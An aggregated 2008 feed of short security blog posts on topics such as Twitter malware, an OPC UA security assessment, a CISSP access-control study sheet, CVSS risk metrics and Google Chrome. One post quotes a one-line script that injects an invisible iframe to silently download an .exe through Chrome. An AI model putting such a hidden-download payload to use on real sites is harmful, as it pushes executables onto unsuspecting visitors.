Friday, September 5, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Twitter Targeted by Malware Distributors [Darknet - The Darkside]

Posted: 05 Sep 2008 02:15 AM CDT

This one is of interest to me as I do actually use Twitter as a microblogging service and to keep up with what various friends are up to. It’s quite an interesting wep app especially paired with something like Twitterfox in your browser and Twibble in your mobile phone. It must have made it big now though [...]

Read the full post at darknet.org.uk

Don't Hassle the Hoff: Recent Press & Podcast Coverage & Upcoming Speaking Engagements [Rational Survivability]

Posted: 04 Sep 2008 11:05 PM CDT

Here is some of the recent press coverage on topics relevant to content on my blog: Microphone

  • Information Week: Virtualization Has A Security Blind Spot
  • Information Week: Securing Virtualization, or is that Virtualizing Security?
  • Network World: Black Hat speakers expose virtualization, OS security gaps (**NOTE: Please see here, VERY important)
  • Network World/Computerworld: Black Hat spotlights virtualization, DNS issues (**NOTE: Please see here, VERY important)
  • SearchSecurity (Australia): Could securing virtualised environments destroy ROI?
  • SearchSecurity: Initial virtualization costs could outweigh benefits
  • Computer Zeitung: Today's Security Products Aren't Ready For Virtualised Data Centres
  • Wall Street Journal: Hackers On the Move
  • Baseline: Managing Mobility In the Enterprise
  • ITWorld: Pros and Cons of VMware's New Security Guide

Podcasts/Webcasts/Video:

I am confirmed to  speak at the following upcoming events:

I will be attending the following events:

/Hoff

This posting includes an audio/video/photo media file: Download Now

Wisdom from Randy Pausch [Kees Leune]

Posted: 04 Sep 2008 08:16 PM CDT

Everyone who reads this post has probably heard of Dr. Randy Pausch's world famous "Last Lecture". Anyone who has not heard of it must stop reading now and go view it.
When the new came of Pausch's death on July 25, the editors of Communications of the ACM felt there could be no greater tribute than to share his own words[...]

What about advice for CS teachers and professors?

That it's time for us to start being more honest with ourselves about what our field is and how we should approach teaching it. Personally, I think that if we had named the field "Information Engineering" as opposed to "Computer Science", we would have had a better culture for the discipline. For example, CS departments are notorious for not instilling concepts like testing and validation the way many other engineering disciplines do.

Source: Wisdom from Randy Pausch, Leah Hoffmann. Communications of the ACM, September 2008, Vol. 51, No 9, p19. (full text pdf, account required)

What else is there to say?

As information security professionals, we are faced with this every day.

One might even leap to the conclusion that had the field been approached as a mature engineering discipline, there would be no need to have as many dedicated security professionals as we do now.

An article well worth reading.

OPC UA: Part 2 - Positive Findings [Digital Bond]

Posted: 04 Sep 2008 02:00 PM CDT

Security assessments by their nature focus on negative findings that could lead to vulnerabilities, and the preponderance of our report focused on what Digital Bond viewed as security deficiencies in the OPC UA specification and SDK code. That said, there are numerous examples of positive findings and text in the report. In fact, there is no comparison between the security in OPC UA and the security of any other control system protocol, with the possible exception of Secure DNP3 and its IEC equivalent. The OPC Foundation should be commended for their security efforts and pressure should be applied to other protocols to step up.

[Note: The security details of OPC UA are being written on a SCADApedia page as the OPC UA blog series is being published]

The major positive security findings are:

  • The OPC UA specification supports options for the use of encryption for confidentiality and signatures for source authentication and integrity. Asset owners using OPC UA will be able to secure client / server communication using the protocol itself rather than add-on security.
  • OPC UA uses a profile approach for specifying functionality including the crypto algorithms and key lengths. This provides flexibility and extensibility. For example, a country or industry sector may develop a new algorithm or select a set of algorithms and parameter settings. These could be listed as a new profile without changing the OPC UA specification. Additionally, the current profiles have leveraged existing, vetted crypto primitives and algorithms rather than try to tackle the difficult process of developing a new security algorithm. Smart choice. [Slight negative - we would have liked to see elliptic curve cryptography because of its computational and message overhead efficiency, but it was not included in the additional profiles due to patent and licensing issues].
  • The overall code quality of the OPC UA SDK was very good. The code base is surprisingly clean of vulnerabilities for a code base of its size. In fact, it is among the cleanest code Digital Bond has seen in the control system space. The code is well written, easy to follow and contains good use of comments. Many common coding errors were not found. For example, there were no off-by-one buffer overflows found, very limited use of insecure function calls, and good boundary checking of buffers both on the stack and on the heap. There are a number of well-written OPC wrappers of common C functionality. Comments in the code remind developers to use safe functions.
  • The security event logging required by the specification will be a fantastic help to attack detection and after incident analysis. It is the best the Digital Bond team has seen in this space by far.

See the rest of the OPC UA Blog Series:

  • Part 1: Intro
  • Part 2: Positive Findings
  • NEXT: Part 3: Specification Vulnerabilities
  • Part 4: SDK Vulnerabilities
  • Part 5: OPC UA Vendor Implementation Vulnerabilities
  • Part 6: Asset Owner Tip Sheet to Analyzing The Security of Competitive OPC UA Servers
  • Part 7: Specification and SDK Improvements

Protesting Now Considered Terrorism [The Falcon's View]

Posted: 04 Sep 2008 01:41 PM CDT

terrorism 1. the use of violence and threats to intimidate or coerce, esp. for political purposes. 2. the state of fear and submission produced by terrorism or terrorization. 3. a terroristic method of governing or of resisting a government. Blocking...

CISSP Study Sheet Access Control [SecurePuter]

Posted: 04 Sep 2008 01:35 PM CDT

Series: CISSP Study Sheet
Entry: Access Control

The CISSP Study Sheet Series identifies the most important details regarding each individual domain within the Common Body of Knowledge. You will want to expand your preparation beyond these study sheets, such as my top 3 favorite CISSP study resources. The intent of this study sheet is to act as a last minute cram of the most significant principles, theories, formulas, and terms for each domain. I recommend reading the CISSP study sheets just before the test, and then doing a "brain dump" of notes for the first 15 minutes onto the paper issued with the CISSP exam. Hopefully, you will have remembered enough to have created an authorized cheat sheet. This second study sheet will focus on the Access Control domain.

Access Control Study Sheet

Access Control Attacks – Denial of Service, wardialing, brute force, shoulder surfing, dumpster diving, sniffing, spoofing, and dictionary attacks.
Identity Management – centralized technologies designed to control access rights of specific identities, such as directories LDAP, NIS, or DNS.
Data Classification – a multitier labeling of information that dictates how a piece of data should be treated.

Identification – unique usernames recognized on computer systems.
Authentication – proof of the claimed identity. Something you know…Something you have…Something you are.
Authorization – what the identity is permitted to do.
Accountability – the use of such things as audit trails to hold responsible the activity of the user.

Who you are… Ok, you are you…What can you do…What you did.

Preventative – access controls enabled to stop unwanted actions by blocking the ability to do them.
Detective – access controls that identify the unwanted actions after they have occurred.
Corrective – access controls which cure the enabling of unwanted actions and restore previous conditions.
Directive – government laws and organizational policy that determines what is allowable.
Deterrent – the repercussions of not following directives.
Recovery – access controls involving the restoration of computing resources after an incident.
Compensating – backup and contingency controls that reinforce normal operations.

Least Privilege – allowing for only the minimum resources needed to accomplish tasks.
Need to Know – not everyone with a secret clearance needs to know everything classified at secret. Certain information should remain only with the persons required to know it.
Separation of Duties – requires collusion of two or more people to commit fraud instead of a single entity having control of complete transactions.

Administrative – access controls related to policies and personnel, such as separation of duties and procedures.
Technical – logical access controls utilizing software and hardware solutions, such as encryption.
Physical – environmental and material access controls, such as doors and locks.

All Access Controls should default to no access.

Password – most used form of access control, but susceptible to brute force and dictionary attacks.
Passphrase – a series of words converted into a password that is not as vulnerable as a simple password.
Password Synchronization – allows users to access multiple systems with one password.
Self Service Password – the ability for users to reset their own passwords without administrative assistance.
Assisted Password Reset – Identification and authentication of a user prior to password reset. Usually through a question and answer process.
One Time Password – a time based synchronous changing of passwords to avoid shoulder surfing and replay attacks.
Single Sign On – centralized authentication database that gives access to numerous resources from one authentication, such as SESAME.
Kerberos – an SSO protocol using a ticket from the key distribution center for authentication in a single security domain. The ticket granting service then generates new tickets with the session keys.

Discretionary Access Control (DAC) – data owner designated access via identity permissions of users or group.
Mandatory Access Contorl (MAC) – sensitivity labeling of information to restrict access via two attributes to an object from unauthorized users.
Role Based Access Control (RBAC) – A form of DAC that uses the owner's discretion to categorize access based on a users specific function or role.
Content Dependant Access Control – an object's content is analyzed by an arbiter program to determine access privileges.
Nondiscretionary Access Control – role based access control managed by the system’s administrator rather than the data owner.

Centralized Access Control – One individual, device, or group makes the decision for network access, such as RADIUS, TACACS+, and Diameter.
Decentralized Access Control – the network access decision is distributed locally, such as peer to peer.

Access Control Lists (ACLs) – a common DAC that designates what users have access to an object, and what functions they are allowed to do on that object.
Capability Table – much like an ACL, but bound to a subject and lists what objects he or she can access.
Constrained User Interface – disallows the ability of a user to interact with certain objects, such as grayed out icons and database views.
Tempest – a way to combat the electrical signals in the airwaves.
Audit Logs – protected and reviewed record of user activities, system events, and application actions.
Keystroke Monitoring – a form of auditing that records every keystroke performed by a user.

Physiological Biometrics – identification and authentication controls recognizing physical characteristics, such as fingerprints and retina scans.
Behavioral Biometrics – identification and authentication controls recognizing mannerisms, such as voice inflections and keyboard strokes.
Biometrics Type I error – rejection of an authorized individual.
Biometrics Type II error – imposter was authenticated.
Smart Card – a physical access control device for authentication

User Provisioning – creation, maintenance, and removal of user attributes in systems, applications, and directories.
HR database – having been developed first and maintained by personal, the HR database is the primary source for user identification.

Intrusion Detection System (IDS) – monitors events in real time to detect intrusion attempts via statistical or signature based analysis, and alerts administrators of a possible attack.
Intrusion Prevention System (IPS) – acts as an IDS but also has advanced capability to stop or prevent attacks.
Host Based IDS & IPS – analyzes single computers for suspicious activity using audit logs and processing irregularities.
Network Based IDS & IPS – analyzes network packets, discards dangerous traffic, and alerts administrators.
Penetration Testing – a series of steps used to bypass systems security controls to gain unrestricted access to systems and data.

Degaussing – returns media to its original state through magnetism.
Phishing – a social engineering attempt to gather sensitive information.

More CISSP Study Sheets and other CISSP resources.

The Daily Incite - September 4, 2008 [Security Incite Rants]

Posted: 04 Sep 2008 08:15 AM CDT

Today's Daily Incite

September 4, 2008 - Volume 3, #74

Good Morning:
After seeing so many live music shows this year, the sizzle is waning. Sure, it's great to see fantastic, charismatic singers. And folks that can make sounds come out of guitar that boggle the mind. But while I was seeing My Morning Jacket last week or John Mayer over the weekend, I didn't focus on the guitarists (as good as they are). I wanted to pay attention a bit to the unsung heroes that make live music happen.
The anonymous bass player
That's right, let's hear it for the rhythm section - the bass guitarist and the drummer. With very rare exceptions you don't go see a band because you like the bass player or the drummer. Of course, you go to see Rush to remind yourself how great Neil Peart is. I think that Sting guy may be able to sing also. But beyond that, who is the drummer? Who is the bass player?

So at the last two shows I tried my best to pay more attention to the bass player and the drummer. They were good. MMJ's drummer had long hair that seemed to do more damage to the cymbals than his drum sticks. John Mayer's bass player kept the rhythm going, but now a few days after the show, I couldn't tell you what that guy looked like. I guess I'm like everyone else. It's the shiny objects that are memorable, not the rhythm section.

The guitarists get all the money and the chicks (or guys if they swing that way). So this weekend let's try not to forget these other folks, even if they are entirely forgettable. Go find a bass player or a drummer and thank them for the labor they provide during every live show. Tell them without their contributions, you'd only have half a band. Half a band sounds like crap. 

And then get back to staring at the guitarist. Man, those guys can play!

Have a great weekend. 

Photo: "bass player" originally uploaded by davidex

Technorati: , , ,

The Pragmatic CSO
The Pragmatic CSO:
Available Now!

Read the Intro and Get
"5 Tips to be a Better CSO"

www.pragmaticcso.com
Get Your Special Report:
6 Easy Steps to Protect Your Identity
and
get access to Security Mike's Portal today

www.securitymike.com

Security Mike's Guide to Internet Security

Top Security News

All that glitters isn't Chrome
So what? - So Google goes and releases a "browser" and the entire Internet is a flutter. Open Source, ooooh. New JavaScript engine, ahhhh. It's even secure! OK, maybe not, since it seems someone ran a fuzzer on it and found some vulnerabilities already. Not that wasn't expected, but it's still funny. Evidently the browser works OK, according to the folks that have played with it. Dennis Fisher figures won't make a huge dent in market share beyond the digit heads, Mitchell is bitching about having to Q/A another browser platform. Do I think this is earth shattering? Nope. But it's clear that the underlying OS will just be a host for a variety of "application" platforms that are optimized for specific use cases. Chrome will be one, maybe Firefox another, maybe you'll get developers extending Chrome to optimize it for their own environments. And it won't matter if you run Windows or Mac OS X or even Linux on your device. This will likely accelerate the marginalization of the OS, and that's a good thing. Amrit is on the right track about this being a "platform" more than anything else. But let's not anoint Chrome as the best thing since sliced bread from a security standpoint until it's been proven. Google does beta stuff pretty well and until I can get NoScript type of functionality (and a Mac version), I'll be waiting on the sidelines.
Link to this

Private browsing - so much for snooping on your folks
So what? - A lot of organizations have deployed user web monitoring, I mean web filtering in order to make sure their users stay productive. That's how they justified the expense anyway. You have a gateway and it stops users from going to "bad" sites that would burn up most of their day (Facebook anyone?). You also could enforce your acceptable use policies based upon cookies and other cache items left on the browser during an investigation. But now everyone is taking Apple's lead and adding a pr0n mode, I mean privacy mode to their browsers. Maybe that's why most of the Apple users I know are a lot happier than those suffering through with IE. IE8 will have it, and so will Google Chrome. So aside from allowing boys to be boys, what are the risks of these private browsers? Basically these do cut off a significant information source for investigations. As Seltzer points out, it's not clear what the real impact will be for compliance purposes and monitoring the use of technology usage by employees. But all is not lost, since we can still monitor the network. You also may want to (try to) enforce the usage of a VPN for remote employees, so their web traffic is routed through your network. Then you can monitor that too. That one's a bit harder, but it's possible. The action-reaction process continues unabated. At least you know these new actions are happening, so you can plan your reactions. 
Link to this

What about #21: Get some hemlock...
So what? - It's happened to most of us. You are walked into the bosses or maybe the HR persons office and then notified you no longer have a job. It's pretty unsettling, though it gets easier every time it happens. Unfortunately, given the state of the global economy, this is likely to happen more frequently over the next couple of months. NetworkWorld has a good article that provides some tips to dealing with it. Basically, you can't freak out and hopefully you've been making contingency plans all along. If you work for someone else, it's kind of silly to assume things won't change in the business and that you'll always be welcome. This isn't the 1950's folks, there is no guaranteed, lifetime employment and a cushy pension at the back end of 30 years of toil and trouble. If you are too "busy" to take some action and get out and network a bit or to even develop a contingency plan, do a little visioning exercise with me. Vision that you are packing up boxes in your office. Then vision how you are going to pay the bills and keep your significant other in the lifestyle she/he has become accustomed to. Not a pretty picture, right? So make sure you are constantly thinking about what's next. Better to be safe, then dealing with the repo man.
Link to this


The Laundry List

  1. Secure Computing puts Securify out of their misery for $15 million and an earn out. VCs took a bath on this one, but that's life in the big city. And it goes to show even a cat only has 9 lives. - Secure Computing release
  2. Novell introduces the most "advanced compliance management" solution, which evidently is a knife to kill the auditor in the parking lot. All kidding aside, what kind of differentiator is "advanced?" - Novell release
  3. Sick of paying for AV? Build your own, just don't try to manage it for more than a desktop or two. - NetworkWorld
  4. You think Ballmer will be master of his own domain? He's under a lot of stress, you know? Maybe Seinfeld will help them fend off the Mac Guy, but probably not. No Office for You! - Dvorak MarketWatch column

Top Blog Postings

It's a big world and it takes time for them to do anything
Gunnar gnashes his teeth a bit regarding how small the aggregate software security market is. Yep, early markets are like that. You have a couple of big vendors that get 80% of the market share and a bunch of smaller one's that don't. When you add everything up, you get a market size probably 15% of a Big Security player like Check Point. The reason is simple. Everyone has a firewall. Not many do software security YET. And the yet is the point. Emerging markets are all about hype and making customers think they have problems they're not sure they have.  No one questions whether they need a firewall. Of course companies should be spending more on software security, but they don't understand that yet. They haven't seen it and been beaten over the head with it for years. That's what it takes. The firewall has been around for over 15 years, software security has not. It's great the software security market is growing, but don't expect it to become very big anytime soon. Only time can make that happen. 
http://1raindrop.typepad.com/1_raindrop/2008/08/software-security-market.html
Link to this

First person XSS
Let me send out a hat tip to Dave Piscitello for pointing me towards Russ McRee's excellent piece on cross-site scripting in the ISSA Journal. A key to being a good defender is to understand your adversaries. So being able to put yourself into the mind of the criminal is critical to being able to defend yourself. So what do you see here from a XSS attack standpoint? Basically it's something that can happen to anyone, and it's hard (as a user) to defend against. I know I pimp NoScript a lot, but it adds a bit of XSS defense as well to your Firefox browser. From a developer standpoint, there are a few tips at the end to keep in mind. Of course, it's unlikely you are the actual developer, so you'll need to evangelize these points to your developers at every turn. Validate inputs, verify outputs, and look at both web app firewalls and code reviews. Russ forgot to tell you to keep fighting the good fight because behaviors don't change overnight and building secure applications does require a behavioral change. Note the link below is a PDF file.
http://holisticinfosec.org/publications/anatomy_of_an_xss_attack.pdf
Link to this

Is there a silver lining in all these clouds?
Cloud this, SaaS that. Every day it's more crap about clouds and services, services and clouds. What's a guy, who likes to keep his feet on the ground, to do? Amrit's been busy lately. I guess spending some time in the Ashram during his Asian swing was good for his writing and time management skills. This post makes a lot of good points relative to the fact that cloud computing will require a different security model. I'm not sure what that model ultimately is, but it's different. Maybe a little different, maybe a lot different, but it's definitely different. Yet, we are still missing the point about what's most important to do now. Thankfully Amrit didn't as he points out it's all about RECOVERING from the inevitable incident. Remember, whether you are consuming or providing cloud services, if there is a question about the reliability and/or security of those services, it takes everyone down with the ship. So make sure you focus on CONTAINING the damage as you architect these services. It will make or break your business. No joke.  
http://techbuddha.wordpress.com/2008/08/29/saas-and-cloud-computing-change-the-cia-paradigm/
Link to this

Seduced by technology... [Roer.Com Information Security Blog - Information security for entrepreneurs]

Posted: 04 Sep 2008 06:40 AM CDT

How can I not be seduced by technology? I am currently sitting in a bus, traveling through Norway. And using the wireless AP of the bus, I am able to work as normal! I check my email, I update my blog, and I even did a Skype call.
How can I not love this?
Security? Well, it is a good idea to use VPN, of course, as the connection is open for anyone...

Are you Owned? [Roer.Com Information Security Blog - Information security for entrepreneurs]

Posted: 04 Sep 2008 01:07 AM CDT

Anton posted about Cyber Security Plans.

I follow you 100%, Anton! There has been a large number of these hijacks lately, and it is obvious that being paranoid is not enough.

It is due time to set up your cyber security plan, and as a bare minimum I suggest it should include:

  • list of all your profiles online, with your log in.
  • list of all your IM/e-mail and other communication tools, with log in
  • list of other sites/tools that requires you to log on.
  • The lists above should also include each sites URL or contact information for changing passwords, or in worst case shutting them down.
  • a friends-list who you trust, and who are willing to help you get back your own life online. The purpose is to have them help you rebuild your internet presence. Make sure you agree some way for them to be certain that they are communicating with you, and not someone else.
  • in case you are living in a less secure part of the world, being 0wned online may also mean you are a target in the real world. A friend of mine got attacked online, and then the appartment was broken into. Nothing but memory cards, pins and similar computer storage was stolen. Makes you wonder, right?

The list will grow. Please help me - what should the Cyber Security Plan look like? What would you do if the worst happens?

XTest - VoIP Infrastructure Security Testing Tool [Darknet - The Darkside]

Posted: 04 Sep 2008 12:39 AM CDT

What is XTest? XTest is a simple, practical, and free, wired 802.1x supplicant security tool implementing the RFC 3847 EAP-MD5 Authentication method. It can be used to assess the password strength within wired ethernet environments that rely on 802.1x to protect IP Phones and the VoIP Infrastructure against rogue PC access. XTest is developed in C...

Read the full post at darknet.org.uk

Risk and CVSS (Post 5) *FINAL* [Risktical Ramblings]

Posted: 03 Sep 2008 07:57 PM CDT


I had no idea that the CVSS topic would turn into a five post series. There was just too much information and thoughts to cram into one or even two posts so for those of you that read even a few let alone all five – thanks for persevering.

Final thoughts on CVSS; two good and two not so good:

NOT SO GOOD:

1.    The CVSS framework is probably not being *fully embraced* or properly utilized by the people that need to leverage it the most – consumers of vendors that use it to score vulnerabilities with their products. Scoring the environmental metrics and observing the impact to the base metrics could add a lot of value. Other frameworks or organizations that reference CVSS scores as part of a vulnerability management process should mention the optional metrics that can influence the base score that a vendor provides. Better yet, maybe throw a disclaimer that the CVSS score listed today may be outdated and needs to be updated.

2.    The CVSS risk vernacular needs to be updated. I would recommend that the CVSS-SOG consider participating in "The Open Group" "Risk Management and Analysis Taxonomy" forum. Better yet, the CVSS-SOG should consider adopting the FAIR methodology. Specifically, use CVSS metrics that could factor into FAIR taxonomy elements. Some of the CVSS metrics focus more on impact then on the vulnerability itself. This can be a slippery slope especially when there are no metrics for "threat event frequency" let alone "loss event frequency".

GOOD

1.    Pretty much all the CVSS metrics have some usefulness and should be able to be used by most information security professionals and especially risk analysts. I am already creating a small utility to use so I can consistently analyze various vulnerabilities and when appropriate – use the metrics as contributing factors for FAIR.

2.    Industry adoption. A lot of vendors use the CVSS framework. PCI-DSS references it for vulnerability related PCI guidelines. Just remember, use the whole framework and do not rely upon what is spoon-fed to you by PCI QSAs or value added resellers. If applicable, take back your ability to analyze risk and make informed decisions.

There you have it. Again, thanks for reading and submitting comments. The feedback and scrutiny has been well taken and appreciated.

Blue Box SE#026 - Astricon 2007 presentation on VoIP security and Asterisk [Blue Box: The VoIP Security Podcast]

Posted: 03 Sep 2008 06:54 PM CDT

Synopsis:  Blue Box Special Edition #26: Astricon 2007 presentation - "Hacking and Attacking VoIP Systems: What you need to worry about"


Welcome to Blue Box: The VoIP Security Podcast Special Edition #26, a 55-minute podcast  from Dan York and Jonathan Zar covering VoIP security news, comments and opinions.   

Download the show here (MP3, 6MB) or subscribe to the RSS feed to download the show automatically. 

You may also listen to this podcast right now:

Show Content:

A year ago in September 2007, I (Dan York) spoke at Astricon 2007 in Arizona, USA, about "Hacking and Attacking VoIP Systems: What You Need To Worry About" My presentation covered a lot of the typical VoIP security threats, tools and best practices but also expanded a bit into specific security issues with Asterisk.  Please do keep in mind that it has been a year since this presentation and so some of the issues I mention have been addressed. (Astricon, for those who don't know, is an annual developer conference for those who work with the Asterisk open source telephony platform. Astricon 2008 is, in fact, coming up in about 3 weeks but I will not be attending this year.)

The slides for this talk are available from Slideshare:

(And yes, at some point I'll sync the audio with the slides.)

Production assistance on this Special Edition was provided by Michael Graves who had a very tough task given the poor quality of the recording that I gave to him!  Kudos to Michael for getting it to sound as good as it does.

Comments, suggestions and feedback are welcome either as replies to this post  or via e-mail to blueboxpodcast@gmail.com.  Audio comments sent as attached MP3 files are definitely welcome and will be played in future shows.  You may also call the listener comment line at either +1-415-830-5439 or via SIP to 'bluebox@voipuser.org' to leave a comment there. 

Thank you for listening and please do let us know what you think of the show.

This posting includes an audio/video/photo media file: Download Now

Google Chrome Silent File Download Exploit [Hackers Center Blogs]

Posted: 03 Sep 2008 06:00 PM CDT

As I said my previous post was destined to be outated very soon.

This is what appeared few minutes ago on milw0rm and packetstorm:

 


< script > document.write('< iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0" >'); < / script >

This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.

Today Hacke [...]

Download the 5th Website Security Statistics Report [Jeremiah Grossman]

Posted: 03 Sep 2008 03:29 PM CDT

Whew, what a mountain of work! I'm ecstatic the complete 5th installment of our Website Security Statistics Report report (all 13-pages) is finally published and available for everyone to see – and comment. I'm also extremely proud that we're able to capture a measurable improvement in overall website security. Good news from inside InfoSec!? I know, weird huh!? We still have a long way to go, but these statistics show we're on the right path and doing the right things:
  • Find and prioritize all websites
  • Find and fix website vulnerabilities
  • Implement a secure software development process
  • Utilize a defense-in-depth website security strategy

Today's webinar went extremely well, slides are available for those interested. And some quick numbers:

Total Websites: 687
Identified vulnerabilities: 11,234
Unresolved vulnerabilities: 3,541 (66% resolved)
Websites HAVING HAD at least one serious issue: 82%
Websites CURRENTLY WITH at least one serious issue: 61%
Average vulnerabilities per website: 5

The shiny new WhiteHat Top Ten

Yes! CSRF finally make the list!

Also covered is:
- Collection methodology
- Time-to-fix and remediation metrics
- Industry vertical comparisons
- Best practices & lessons learned

Feedback on what other numbers people would like us to report on in the future is very welcome.


Crazed Bovine Traversal in RL [Room362.com]

Posted: 03 Sep 2008 01:13 PM CDT

As you may have heard me rant and rave about a special USB stick that downloads contact, messaging, and other information from phones just by plugging them in on Episode 5 of Securabit or read about it via an earlier posting on my blog (Crazed Bovine Traversal). A company called Paraben Corporation went out and made it (Motorola and Samsung support only so far)

I first learned about it via CNet’s report “CSI Stick grabs data from cell phones” and you can find it directly on http://csistick.com/ for $199.00 plus you have to buy the accessory “DS Lite” just to read the data on it. (another 99.00). I think they should at least send me one for free for stealing my idea ;-)

 

 

Risk and CVSS (Post 4) [Risktical Ramblings]

Posted: 03 Sep 2008 12:09 PM CDT


We are now up to the CVSS "Environmental Metrics" group. According to the CVSS documentation, this group 'captures the characteristics of a vulnerability that are associated with a user's environment'. This group is also optional from a scoring perspective and is intended to be completed by someone familiar with the environment the vulnerability resides within.

In "Post 1" I mentioned that CVSS does not take into consideration "threat event frequency" or how often I expect to get attacked nor does it take into consideration "loss event frequency"; how often I expect to realize a loss. The "environmental metric" does not fill this void either – but there is still value in being able to quickly analyze vulnerability in the context of these metrics – again, as contributing factors to various FAIR risk taxonomy elements.

FAIR & CVSS "Environmental Metrics) Mapping

FAIR & CVSS

Collateral Damage Potential. This metric measures the potential for loss of life or physical assets through damage or theft of property. Now real quick, I scoffed when I saw the loss of life – and none of the risk issues I have ever dealt with ever involved estimating loss of life. However, there are real life examples of software defects (essentially vulnerabilities) that have loss of human life implications. Take a look at "Geekonomics" by David Rice, there is some fascinating information in the book that will give you a whole new perspective on vulnerabilities. Getting back on track, the collateral damage metric maps very well to the "probable loss magnitude (PLM)" branch of the FAIR taxonomy. I do not want to dive into PLM right now – but let me state this – the word potential is not the same as probable, nor does it imply expected loss. So with the CVSS metric it could be very easy for someone to err on the side of a worst case loss versus choosing a value that best resembles expected loss. Either way, with CVSS this would just result in the CVSS score being raised. I would prefer to see a value in terms of dollars; whether it is monetary ranges or actual expected loss amounts based off simulations.

Target Distribution. This metric measures the proportion of vulnerable systems. I like this metric and I think it can be very useful as a contributing factor to the FAIR taxonomy element "threat event frequency"; specifically "threat contact" and possibly "threat capability". The number and placement of vulnerable systems in my environment could directly factor into how often or what type if threat agents I expect to come into contact with the vulnerable systems – let alone attack them. Remember, within FAIR – attacking an asset with a vulnerability does not guarantee loss. We have to take into consideration the ability of the attacker to overcome the control resistance applied to the asset.

Security Requirements. These metrics enable the analyst to customize the CVSS score based on the importance of the affected IT asset to a user's organization in terms of confidentiality (CR), integrity (IR), and availability (AR). Possible values include: LOW, MEDIUM, HIGH, or NOT DEFINED. These metrics were designed to work with the CVSS "Base Metrics" group; specifically the CIA Impact metrics. So if the vendor analyst states that a vulnerability has a Confidentiality Impact, and the analyst for the organization that has the vulnerable asset states that her or his organization has a Confidentiality Requirement – then the CVSS score could increase. Sounds pretty straightforward – seems to map nicely into the PLM branch of the FAIR taxonomy. Specifically, as contributing factors to estimating loss should the vulnerability be exploited and a loss occur.

It is too bad that the CVSS environmental metrics are optional. I understand why they are and regardless of CVSS generating a score and not taking into account loss event frequency - just imagine how much more informed a security folks and decision makers could be if they took a few more minutes to analyze a given vulnerability and the CVSS score that was provided to them from a vendor in light of these metrics.

In the next (and final) CVSS post, I will share some final thoughts on CVSS and finally put a nail in what was not intended to be a series of posts. Thanks for reading!

Are the weather people disappointed? [StillSecure, After All These Years]

Posted: 03 Sep 2008 12:04 PM CDT

Is it me or do you all feel that the media people covering recent hurricanes seemed almost disappointed that Gustav and some of the other storms have not been as strong as they could have been and not as destructive?  I definitely sensed it with the coverage of New Orleans. It felt like the media had gathered for a party and it just wasn't up to the level of carnage they expected.

Today though in listening to the weather forecast on Hanna, the next storm coming up, the weather person seemed disappointed that the storm seemed to be losing muster and was not as well formed.  Hey, there is plenty of bad news to go around without worrying about a storm that fizzles out.  Why not report on the economy, the housing market or any one of the other multitude of problems out there. I for one am glad that the storms are not as bad so far!

Brass Tax on Chrome [Room362.com]

Posted: 03 Sep 2008 10:58 AM CDT

So there is already an exploit: http://blogs.zdnet.com/security/?p=1843

There are naysayers: http://www.tgdaily.com/content/view/39154/108/

And then there is the truth: http://www.stillsecureafteralltheseyears.com/ashimmy/2008/09/sucking-the-chr.html

I like the design of the tabs and address bar, but I can do that with a theme in firefox. I want my add-ons, even with the memory problems. Chrome is great for Mom and Pap, but for “Internet Power Users” it falls lightyears short on features. So where is the brass tax?

IMHO:

Firefox > (INSERT CHROME HERE) > Opera > Safari > IE7 > IE8 > IE6

In other news: Yousif Yalda has made it to the coveted “Stupid People” link category, where until now was solely held by Ashley Park.

And the hits just keep rolling in:

AUTOMATIC DOWNLOADS? What?! http://www.milw0rm.com/exploits/6355

August SCADApedia Entries [Digital Bond]

Posted: 03 Sep 2008 10:18 AM CDT

SCADApedia - - all can read - - subscribers can write.

New entries in August:

A number of the other pages have been updated as well.

You may also want to look at All Pages or the links to Control System Vulnerability Notes or the links to Digital Bond’s Research Projects.

Google Chrome [Kees Leune]

Posted: 03 Sep 2008 09:15 AM CDT

Google released its own web browser, named Chrome, yesterday, and many blog posts have already been dedicated to it.

I agree with Martin McKeay's judgement: "So what?" The browser seems to have some interesting ideas, but it does not warrant switching over it. I'm not sure if Google is trying to make a serious attempt at getting into the desktop browser market, or if they want to use the product to push the envelope of technology by demonstrating that certain enhancements are possible in production-quality code.

The fact that Chrome installs (and runs) on Windows without administrator privileges is interesting though. Another thing that we have to remember is that Google will probably package it with their bundle. Basically, anyone downloading Picasa or Google Earth will probably end up with a copy on their system. Even if they never use that, it is yet another source of potentially insecure code.

We'll see; I haven't seen anything that would prompt me to go in and switch my default browser to Chrome. I'll use it to see if a page renders properly when I'm testing something, but I also do that with IE, FF, Konqueror, Opera, Safari, etc.

I'm not entirely sure that Google's strategy is for this. I agree with the observation made in Martin's podcast: this will probably take away from Firefox's market share much more than it will take away from IE (if any effect can be seen at all)

I stole an iPhone... NOW WHAT?! [Donkey On A Waffle]

Posted: 03 Sep 2008 08:49 AM CDT

I was just spending a bit of time catching up on my blogosphere reading this morning when I was intrigued by a statement made by none other than my brother. Over at his AtariNinja.org blog, he authored a brief piece downplaying the risk of the latest iPhone screen lock bypass hack. While I agree with nearly all of his points, one line stood out from the rest.

This is a serious bug but I really don't suspect people stealing iPhones are doing it to get at your personal information. They are likely after the hardware to sell.

I'm not entirely sure I agree on this subject. While the comment makes sense at face value, and indeed the majority of iPhone thefts today are primarily geared at the resale value of the hardware itself, why wouldn't a thief at least entertain the opportunity to peruse and potentially abuse the data on the stolen device. Given the fact that it's apparently quite trivial to bypass the phones security screen lock features, what economic opportunity cost is there that would stop a "bad guy" from at least reviewing your data for potential money making opportunities? If a thief steals a car, they wouldn't ignore what's in the trunk and just sell the car (hardware) off quickly. I'd imagine they would pop the trunk (trivial to pass the trunk lock once your in the car) and see what is inside to plunder.

Because of the above opinions, the risk of the iPhone screen lock bypass vulnerability is quite high dependent upon what data you have stored in your phone. Sure there are some mitigating factors, as wxs has outlined in his post, but they don't lessen the risk of the vulnerability, instead they only serve to lower the likelihood of exploit.

What are you thoughts on the issue? Is the business risk of the iPhone screen lock bypass vulnerability really that high? Or are the majority of criminals in the world just going to wipe and sell your phone to the highest bidder on ebay? I don't know about you, but I'm not leaving my data to chance... (comments are open)

Humans - the weakest chain in the link? [StillSecure, After All These Years]

Posted: 03 Sep 2008 07:57 AM CDT

